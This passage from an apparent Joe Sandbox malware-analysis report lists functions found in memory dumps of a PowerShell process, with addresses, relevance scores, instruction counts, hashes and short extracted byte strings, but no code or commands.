                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f174354febb62d65dc1d197af5b26f58800d1fce4d799c6c77fe1f5bdb9b6ee
                                                                    • Instruction ID: 86b4af1daff2bda7b08909a3fcc72672c6a0afe66cf2a98a0ce251ac4460218a
                                                                    • Opcode Fuzzy Hash: 9f174354febb62d65dc1d197af5b26f58800d1fce4d799c6c77fe1f5bdb9b6ee
                                                                    • Instruction Fuzzy Hash: 4C515C70A046098FCB14DF9CC4849AEBBF2FF89314F658658E915A73A4C331EC52CB80
                                                                    Function 09681DB0 Relevance: .1, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7db70388ffc91f22459f5408a08c742bf305c7c263f26ee28d85b1b80583238
                                                                    • Instruction ID: 8aac3f70d1132043dfa9da2ca78905bc27f5b85c9c448e66694c9997af0dae88
                                                                    • Opcode Fuzzy Hash: e7db70388ffc91f22459f5408a08c742bf305c7c263f26ee28d85b1b80583238
                                                                    • Instruction Fuzzy Hash: 64513870A046098FCB15DF9CC5949AEBBF2FF89310F658618E955A73A4C331EC52CB40
                                                                    Function 07D90AF0 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0245fa71d080306af52d8897ca04b1400c11f3091cf20c983b7d453006cd73d
                                                                    • Instruction ID: 03a25549b0438e01df24981032446ad7bb7af15ee55cb36190622702b0c7f644
                                                                    • Opcode Fuzzy Hash: e0245fa71d080306af52d8897ca04b1400c11f3091cf20c983b7d453006cd73d
                                                                    • Instruction Fuzzy Hash: 483125B27002168BCF549E79E9413AEFBE5AF84719F14883AC956CB251DB32DA01C7E1
                                                                    Function 09681800 Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0ed104a764d31236567c2d7aa2e5c4704f886a827e2eaec91789cd63e33969d5
                                                                    • Instruction ID: d2ad7e3ab1bc3d2d4075045a8645bcbc873bf9cf9fa810e12235fe8d75f4fe88
                                                                    • Opcode Fuzzy Hash: 0ed104a764d31236567c2d7aa2e5c4704f886a827e2eaec91789cd63e33969d5
                                                                    • Instruction Fuzzy Hash: 01414C74A051098FCB15DF9CC9849AEBBF2FF49320B258658E855E73A4C735EC82CB90
                                                                    Function 09680E28 Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0854e6235aae48780a6dcd2c3bd73dccf7888c36500de550faa030070f7fc549
                                                                    • Instruction ID: be51ab244953a483b6c826efc66b5855eb657a4d0c4721045926044d4e719dc6
                                                                    • Opcode Fuzzy Hash: 0854e6235aae48780a6dcd2c3bd73dccf7888c36500de550faa030070f7fc549
                                                                    • Instruction Fuzzy Hash: B8410570A002099FCB05DF9CC9849EEBBB2FF88324F248658E955A73A4C735EC51CB90
                                                                    Function 09680E1F Relevance: .1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: feaeb4392ad112a316dc103f01045835ee0acd1a6bc0b1634da9e1e4c9c0a90c
                                                                    • Instruction ID: 6b6e5727c3a5d7017de5c641c30d458bb69466fa78f05dc2ffad31113bd31bc4
                                                                    • Opcode Fuzzy Hash: feaeb4392ad112a316dc103f01045835ee0acd1a6bc0b1634da9e1e4c9c0a90c
                                                                    • Instruction Fuzzy Hash: C1410271A002099FCB04DF9CC9849EEBBF2FF88324F248658E855A73A4C731AC51CB90
                                                                    Function 096817F0 Relevance: .1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0fa693809c7be2c21cf56da00b0dd0eb9fccf30ac189cb7bd5406d17e17ccdac
                                                                    • Instruction ID: 74a9fc2fe2e22e687da5e01a5cf263d2e5b5b5df92b5a59621cfb230652f6910
                                                                    • Opcode Fuzzy Hash: 0fa693809c7be2c21cf56da00b0dd0eb9fccf30ac189cb7bd5406d17e17ccdac
                                                                    • Instruction Fuzzy Hash: D1411874A015098FCB14DF9CC9849AEBBF2FF49320B258658E955E73A4C735EC42CB90
                                                                    Function 09680E18 Relevance: .1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b1f4f11953ed884079125d1d14ea1cbe77776c3c6a6e71402638fa3e1b73b4d
                                                                    • Instruction ID: 33ce63a8fb3ea0e011b5e41000b8452f0f4ed471097ec65979efebf38b7c4fa0
                                                                    • Opcode Fuzzy Hash: 8b1f4f11953ed884079125d1d14ea1cbe77776c3c6a6e71402638fa3e1b73b4d
                                                                    • Instruction Fuzzy Hash: FE41F475A005099FCB14DF9CC9849EEBBF2FF88324F248658E855A73A4C735AC51CB90
                                                                    Function 09680467 Relevance: .1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319358606.0000000009680000.00000040.00000800.00020000.00000000.sdmp, Offset: 09680000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9680000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4dba8289f1a1548b232cf9ee5fe1f8aece6c9579186dc62c57da4f5ded3692d0
                                                                    • Instruction ID: f3b1dfa0fcbb5ae81cd0d378338b7e6e2a5dd21474e6603da5aa695a3c7a1732
                                                                    • Opcode Fuzzy Hash: 4dba8289f1a1548b232cf9ee5fe1f8aece6c9579186dc62c57da4f5ded3692d0
                                                                    • Instruction Fuzzy Hash: 5E41F475A015099FCB14DF9CC9809EEBBF2BF89320B248658E855A7364C731EC81CBA0
                                                                    Function 07D98A3C Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d0f0fc01344e1acd1b9b2e34bf2eefbabaae890f36ac9aa911af584d281501e
                                                                    • Instruction ID: 9da0184f1d551eb935e5e3c0c6513216d2d6982521ec337b4d59e0b93bbd8ce1
                                                                    • Opcode Fuzzy Hash: 1d0f0fc01344e1acd1b9b2e34bf2eefbabaae890f36ac9aa911af584d281501e
                                                                    • Instruction Fuzzy Hash: E73138F27001158BCF2167789A11A6EFB52DFD6B19F14C4BACA52AF255DE328D01C3B2
                                                                    Function 07D9657C Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17758f28980d8702867b8b5c1af1adfd11853e4995623d94532c7141cc2a8a06
                                                                    • Instruction ID: de455a2cdca960aac9eaf57951638fcf02f674220d19a7a7fb9f21db2c0ed0b2
                                                                    • Opcode Fuzzy Hash: 17758f28980d8702867b8b5c1af1adfd11853e4995623d94532c7141cc2a8a06
                                                                    • Instruction Fuzzy Hash: E93178F2714202DBCF215A3895117BAFBA2CFC2311F0484BAD542CB295EF36D955C7A2
                                                                    Function 07D90FB4 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09ee6393748136a126f5aa89ef729ee83c894ce409e01f4c81f541f11efa3261
                                                                    • Instruction ID: 471a505b2aa86ca77c3b1c0500f2b74b77b92b3f410267bf3c555068ea5b6a63
                                                                    • Opcode Fuzzy Hash: 09ee6393748136a126f5aa89ef729ee83c894ce409e01f4c81f541f11efa3261
                                                                    • Instruction Fuzzy Hash: 3D219EB6304387ABDF240A394950772BFA19F86701F288466D588DB2D2DA7BCC44C371
                                                                    Function 07D91CB6 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 46abf6ff11d51912d0eeb08dbfd6be5952752e88333b7e1e15904c39ff32e258
                                                                    • Instruction ID: c0522320720e1a37153629c65dd499568aa875a64d8ae55f97b805281d45ec49
                                                                    • Opcode Fuzzy Hash: 46abf6ff11d51912d0eeb08dbfd6be5952752e88333b7e1e15904c39ff32e258
                                                                    • Instruction Fuzzy Hash: ABA011302000008BC200CA00C882828B320AB8220AB28C0E8A80A8F28BCB23E8038B00

                                                                    Non-executed Functions

                                                                    Function 07D9F5E8 Relevance: 20.4, Strings: 16, Instructions: 368COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$84ul$84ul$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-4189535814
                                                                    • Opcode ID: a545b26746d43891a4a21fb6611ea6ebbd5fb3c389bb3963c61128dcb2ddd47d
                                                                    • Instruction ID: 9f8ef33774b34a93b5cf1ff8cc17b2fb5248a8728c1bb20219258079d4b72afc
                                                                    • Opcode Fuzzy Hash: a545b26746d43891a4a21fb6611ea6ebbd5fb3c389bb3963c61128dcb2ddd47d
                                                                    • Instruction Fuzzy Hash: 29C125B1B00206DFCF249F69C55066AFBE6EF85710F2484BAD845DB251DB35CD41CBA1
                                                                    Function 07D980E8 Relevance: 16.6, Strings: 13, Instructions: 344COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,Swl$,Swl$4']q$4']q$4']q$4']q$d5gk$xSwl$$]q$$]q$$]q$ml$ml
                                                                    • API String ID: 0-2563621688
                                                                    • Opcode ID: 7fec6909be0f210df8ab16d9da58144b529cffdb3a6192b2e03302328b0dc06c
                                                                    • Instruction ID: e1d05ce7ccc2b25e4352b6c638c70660e4434476d3dbd4b4d0302de6416e330e
                                                                    • Opcode Fuzzy Hash: 7fec6909be0f210df8ab16d9da58144b529cffdb3a6192b2e03302328b0dc06c
                                                                    • Instruction Fuzzy Hash: 83B148B1B04306CFCF259B7CC9106AAFBA6AFC3A10F1884BAD945CB251DA35C845D7A1
                                                                    Function 07D9C2B0 Relevance: 13.8, Strings: 11, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$4']q$4']q$tLik$tLik$x.hk$-hk
                                                                    • API String ID: 0-668401580
                                                                    • Opcode ID: 87fce502f4e9a4595e8d866e8b2c20b3c14b535f40ee8afcc1f255ec18cdb1f2
                                                                    • Instruction ID: bfc68e402a84e118c4c2697fdf0a715487c9bae53e2cf8840072bb6405f70332
                                                                    • Opcode Fuzzy Hash: 87fce502f4e9a4595e8d866e8b2c20b3c14b535f40ee8afcc1f255ec18cdb1f2
                                                                    • Instruction Fuzzy Hash: DFC0803244021827C33411555C0D9CF7F2CD743770F410256941537901D854368D8AF1
                                                                    Function 09670700 Relevance: 12.8, Strings: 10, Instructions: 288COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$84ul$84ul$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-669978221
                                                                    • Opcode ID: 74bff38d905f9938738213ada3888732f20147d1f29989091895fb93f9f0c50c
                                                                    • Instruction ID: fb5c9a5092d703a878854c6511946cf20c3a4a47119d9e2550198f707a1005f4
                                                                    • Opcode Fuzzy Hash: 74bff38d905f9938738213ada3888732f20147d1f29989091895fb93f9f0c50c
                                                                    • Instruction Fuzzy Hash: 6EA1D030700309EFDB258F68C9446BAFBA6AF84351F64846AF8459B391DB35DC91CBB1
                                                                    Function 07D9B020 Relevance: 12.8, Strings: 10, Instructions: 280COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2309685269
                                                                    • Opcode ID: 9ac4846d4db1b8fdf2e91b80d8204e0dbe3da6fcb324a58181fe4a1c6e67d883
                                                                    • Instruction ID: d9bc329f49e64a9df2360ffe7feb26e9feed4d8797a5684cededdcc7f039b715
                                                                    • Opcode Fuzzy Hash: 9ac4846d4db1b8fdf2e91b80d8204e0dbe3da6fcb324a58181fe4a1c6e67d883
                                                                    • Instruction Fuzzy Hash: 939124F1B00215DFCF288E68E950AAAF7A2EFC5710F15C47BD8569B254CA32DD41CBA1
                                                                    Function 096736E8 Relevance: 11.6, Strings: 9, Instructions: 383COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84ul$84ul$84ul$84ul$tP]q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2201837859
                                                                    • Opcode ID: b1c38dd37a056cf09f308b11f8ff4f55495d92c663a09ca78865459d7d0c63ad
                                                                    • Instruction ID: daa98c23519a6e7174850fcda9857bf1cdaaf523125671be0e7299b0f51bc50d
                                                                    • Opcode Fuzzy Hash: b1c38dd37a056cf09f308b11f8ff4f55495d92c663a09ca78865459d7d0c63ad
                                                                    • Instruction Fuzzy Hash: ACD10731700308AFCB149F68E951A6AFBB6EF88750F24846AF8559B390DB31DC51DBA1
                                                                    Function 07D90840 Relevance: 11.5, Strings: 9, Instructions: 206COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$ml$ml
                                                                    • API String ID: 0-2405320642
                                                                    • Opcode ID: e10f9de7b508563531957cfcea69dc4388ef147706790445001197df8547ad65
                                                                    • Instruction ID: 8e69575c44baf64d5905cead2299afda2530d1a48190898e1c5d828970730c24
                                                                    • Opcode Fuzzy Hash: e10f9de7b508563531957cfcea69dc4388ef147706790445001197df8547ad65
                                                                    • Instruction Fuzzy Hash: C06135B17002079FDF29AA69A91067AFBE6AFC2710F18847AD985CB251DA35C841C7E1
                                                                    Function 0967460A Relevance: 10.3, Strings: 8, Instructions: 324COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84ul$84ul$84ul$84ul$tP]q$tP]q$tP]q$tP]q
                                                                    • API String ID: 0-1956780585
                                                                    • Opcode ID: 525075f91980756d18243104b10975eb4362e296b72b006a6b379353b8a1c9d5
                                                                    • Instruction ID: 4bcae4f26108451d16a3b92c7bced87ae435c563bd39cebb2d9dc65b42caba34
                                                                    • Opcode Fuzzy Hash: 525075f91980756d18243104b10975eb4362e296b72b006a6b379353b8a1c9d5
                                                                    • Instruction Fuzzy Hash: 0FC1AD35A002199FCB14CF68D594A6AFBE3FF88750F248869E9519B360DF35DC42CBA1
                                                                    Function 096721D8 Relevance: 10.3, Strings: 8, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84ul$84ul$84ul$84ul$tP]q$tP]q$tP]q$tP]q
                                                                    • API String ID: 0-1956780585
                                                                    • Opcode ID: 12463c5a97e8b9676f8eac5c6d88f6887c19549d4df876345f9d8b88de3477e5
                                                                    • Instruction ID: 03ca4b46d039866f60784b70b1fe6713bc50884d09f1da2df5c25d09d49b7970
                                                                    • Opcode Fuzzy Hash: 12463c5a97e8b9676f8eac5c6d88f6887c19549d4df876345f9d8b88de3477e5
                                                                    • Instruction Fuzzy Hash: 9F91E431B403149FCB14DF68D964A6AFBE2FFC8710F248859E9659B354DA31DC42CBA1
                                                                    Function 09670AED Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84ul$84ul$XRbq$XRbq$XRbq$tP]q$tP]q$$]q
                                                                    • API String ID: 0-1327497370
                                                                    • Opcode ID: 94d276e89bea2c73b40774305ca6879fb14fb647529e6e41079de451e6b11837
                                                                    • Instruction ID: c2282a1fd957dc2fcb3349598d4b67a8677e7f543be95609eb70e2f511dbb5a9
                                                                    • Opcode Fuzzy Hash: 94d276e89bea2c73b40774305ca6879fb14fb647529e6e41079de451e6b11837
                                                                    • Instruction Fuzzy Hash: E8612531B40304DFCB259F688540AAAFBA2EF88714F64C46AE9059F395CB36DD41CBB1
                                                                    Function 09671AB8 Relevance: 10.1, Strings: 8, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-1463543948
                                                                    • Opcode ID: 27a808f9dab7f4fc91de5aa57f0e0764ddb8e90e32657f3db61cf677f46cd3c3
                                                                    • Instruction ID: 334f318f26a3ccc45174898b12d17db668ef0539f0a12f03bb9ae27dfffeb10c
                                                                    • Opcode Fuzzy Hash: 27a808f9dab7f4fc91de5aa57f0e0764ddb8e90e32657f3db61cf677f46cd3c3
                                                                    • Instruction Fuzzy Hash: 27415B327083548FCB248F7DD88056AFBF5EF86B10B1644ABE845CB352DA31D805C7A1
                                                                    Function 07D9F5DF Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$84ul$d%cq$d%cq$d%cq$tP]q$$]q
                                                                    • API String ID: 0-2102926160
                                                                    • Opcode ID: 0fe89274e444a9240f57908571a75f1a08c4eed4b4b82914529463cdf9b188ca
                                                                    • Instruction ID: 48b9e82308bb9ef1af1227835863f74ee049d8ef2c350961934021c50150e770
                                                                    • Opcode Fuzzy Hash: 0fe89274e444a9240f57908571a75f1a08c4eed4b4b82914529463cdf9b188ca
                                                                    • Instruction Fuzzy Hash: 935181F1A10206DBDF249F25C580A79FBE2AF44750F188576E855EB2A1DB31DD80CBA1
                                                                    Function 07D9EC20 Relevance: 7.7, Strings: 6, Instructions: 212COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-1480752206
                                                                    • Opcode ID: d3c1cfc453e0427cf714c289fe3470ab643e958a4c30a3f00165cd04e6b4157f
                                                                    • Instruction ID: d4966a217a969d3c10cee7e91166718aee9b9062aa62d5ce0107faa64a4ff26b
                                                                    • Opcode Fuzzy Hash: d3c1cfc453e0427cf714c289fe3470ab643e958a4c30a3f00165cd04e6b4157f
                                                                    • Instruction Fuzzy Hash: D46104B270420ADFCF28CF29D4442AAFBE6AF81221F1CC47AD895CB251DB35D945C7A1
                                                                    Function 096706FD Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$84ul$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-270489599
                                                                    • Opcode ID: fdab2a9edb8b3e3f1bc29db502929510fa299c631d51eecef6279cc23bd2fc2c
                                                                    • Instruction ID: 294f6719678494199c40bc1284cc3244f475c7bd68ec7c5bf25b312190efe2f0
                                                                    • Opcode Fuzzy Hash: fdab2a9edb8b3e3f1bc29db502929510fa299c631d51eecef6279cc23bd2fc2c
                                                                    • Instruction Fuzzy Hash: D2619E70A00309EFEF288E18C545BBAF7A2AF84751F688466F8459B391C775DC81CBB1
                                                                    Function 07D9E888 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$84ul$84ul$tP]q$tP]q
                                                                    • API String ID: 0-4125856461
                                                                    • Opcode ID: 13cd6d65bd08213f9d0c8a6b668ebf4059dc09835fb6b7f2def8aeeb865e666d
                                                                    • Instruction ID: 7cab2c50b791bc726b0cba39748f0de345d9e1241328074e00090ef53817331f
                                                                    • Opcode Fuzzy Hash: 13cd6d65bd08213f9d0c8a6b668ebf4059dc09835fb6b7f2def8aeeb865e666d
                                                                    • Instruction Fuzzy Hash: 21413472B002159FCB24DBA88540A6AFBE6EFC5720F24C47AD9558B255CB32CD46C3A1
                                                                    Function 07D9B410 Relevance: 7.6, Strings: 6, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: 3e2b8ea4e008b72a1a064e3ed5232d924a802dd01de9460ed9c2dd6de9ed1c2a
                                                                    • Instruction ID: f8e62480e5db179e592e373eea04bfc84d65de07be0fdd630561369b512f9b79
                                                                    • Opcode Fuzzy Hash: 3e2b8ea4e008b72a1a064e3ed5232d924a802dd01de9460ed9c2dd6de9ed1c2a
                                                                    • Instruction Fuzzy Hash: 214165F1B0430ADFCF298E69B85026AFBF5EF82214B1584BBC894CB252CA31C805C761
                                                                    Function 07D9F70E Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
